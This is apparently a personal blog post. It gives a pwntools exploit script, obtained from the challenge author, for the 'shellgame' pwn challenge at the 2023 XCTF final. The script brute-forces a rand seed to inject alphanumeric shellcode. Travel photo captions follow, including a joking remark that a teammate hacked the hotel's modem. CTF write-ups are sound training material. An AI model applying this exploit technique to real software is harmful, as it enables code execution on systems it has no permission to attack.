XCTF-final-shellgame && photos of travelling

2023南京-XCTF决赛一道misc中的pwn题

Posted by l0tus on 2023-04-01
Estimated Reading Time 3 Minutes
Words 800 In Total
Viewed Times

赛题

没想到第一次校外的线下赛居然是这么大型的XCTF总决赛,虽然老学长们杀进冠军直通的时候我还没上大学,现在居然有幸和战队一起去南京。决赛12小时,我做了一下午的这道misc里的pwn。到头来也只是有了个思路,比赛结束后我在qq上找出题人空白爷要来了exp,现在就作为复现一下赛题。

题目思路大概是通过给出的10个序列,爆破种子,恢复160个随机数。计算每一步需要加的随机数个数拼凑明文shellcode。
关于后面pid的绕过,crazyman的原话是:“the part about the value of pid can consider using the idea of ​​simulation to obtain pid==1”。
我现在还没完全学会这道题,详细步骤还得等之后来写。

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
from pwn import *
from ctypes import *
io=process('./shellgame')
#io=remote('127.0.0.1',11451)
context.arch='amd64'
context.log_level='debug'
libc = ELF('./libc.so.6')
rl = lambda a=False: io.recvline(a)
ru = lambda a, b=True: io.recvuntil(a, b)
rn = lambda x: io.recvn(x)
sn = lambda x: io.send(x)
sl = lambda x: io.sendline(x)
sa = lambda a, b: io.sendafter(a, b)
sla = lambda a, b: io.sendlineafter(a, b)
irt = lambda: io.interactive()
dbg = lambda text=None: gdb.attach(io, text)
lg = lambda s: log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s, eval(s)))
uu32 = lambda data: u32(data.ljust(4, b'\x00'))
uu64 = lambda data: u64(data.ljust(8, b'\x00'))
clib = cdll.LoadLibrary("./libc.so.6")
ru("Your lucky number is:\n")
line = io.recvline().decode()
data = line.split(' ')[:-1]

src = []
for i in data:
src.append(int(i[2:]))
for i in range(len(src)):
if src[i] < 0:
src[i] = 0x100 + src[i]
seed = 0
for i in range(0x101):
clib.srand(i)
flag = 0
for j in range(10):
t = clib.rand() % 0x100
if t != src[j]:
flag = 1
break

if flag == 0:
seed = i
break
src = [0 for i in range(161)]
clib.srand(seed)
for i in range(161):
src[i] = clib.rand() % 0x100

seedlist = []
#shellcode = "W828Rvj8jf9zfYWj3hzZR9HR8ZYTT5ik0ZC839i3TjAiZTCRTiW88Bj0itY4Wfe99YoT08PTbfAf88i038sCWYfstX119TX00ZUtnYDSPZTJTX00TTA0AnmTYAjKT090T4iWjYH80iY1W"
shellcode="W828Rvj8jf9zfYWj3hzZR9HR8ZYTT5ik0ZC839i3TjAiZTCRTiW88Bj0itY4Wfe99YoT08PTbfAf88i038sCWYfstX119TX00ZUtnYDSPZTJTX00TTA0AnmTYAjKT090T4iWjYH80iY1W"
des=[]
for i in range(len(shellcode)+1):
if i!=len(shellcode):
des.append(hex(ord(shellcode[i])))
else:
des.append(hex(0))

print(des)
des=[]
for i in range(len(shellcode)+1):
if i!=len(shellcode):
des.append(ord(shellcode[i]))
else:
des.append(0)
for i in range(len(shellcode)+1):
t = des[i] - src[i]
if t < 0:
t += 0x100
for j in range(0x2000):
clib.srand(j)
if clib.rand() % 0x100 == t:
seedlist.append(j)
break
src[i + 1] = (src[i + 1] + clib.rand() % 0x100) % 0x100
src[i + 2] = (src[i + 2] + clib.rand() % 0x100) % 0x100
print(seedlist)

def add(idx,seed):
sa(b'> ',b'1'.ljust(0x10,b'\x00')+p32(seed))
sa(b'> ',str(idx).ljust(0x14,'\x00'))
for i in range(1,len(seedlist)+1):
add(i,seedlist[i-1])
io.send(b'4'.ljust(0x14,b'\x00'))

io.interactive()

南京之旅

最终队伍成绩有点遗憾不是非常出色,后面几天大家一起玩了玩南京
line1 to CPU:

pwn\iot 银趴(白夜、nameless、doddy、me):


比赛时候我喝的:

白夜喝的:

到酒店当晚doddy日了酒店光猫:



和chuj、summer、lattice一起看了秦淮河,夫子庙:




xctf-final场内选手和裁判们合影以及summer给的参赛证:


音乐台喂鸽子,合影:


南京大排档午餐,合影:

南京博物院、里面有民国建筑:






总统府,有可爱的小女孩和猫猫:





中山陵,俯瞰南京城:

观光车上:

以及街头的一个好玩的:


如果您喜欢此博客或发现它对您有用,则欢迎对此发表评论。 也欢迎您共享此博客,以便更多人可以参与。 如果博客中使用的图像侵犯了您的版权,请与作者联系以将其删除。 谢谢 !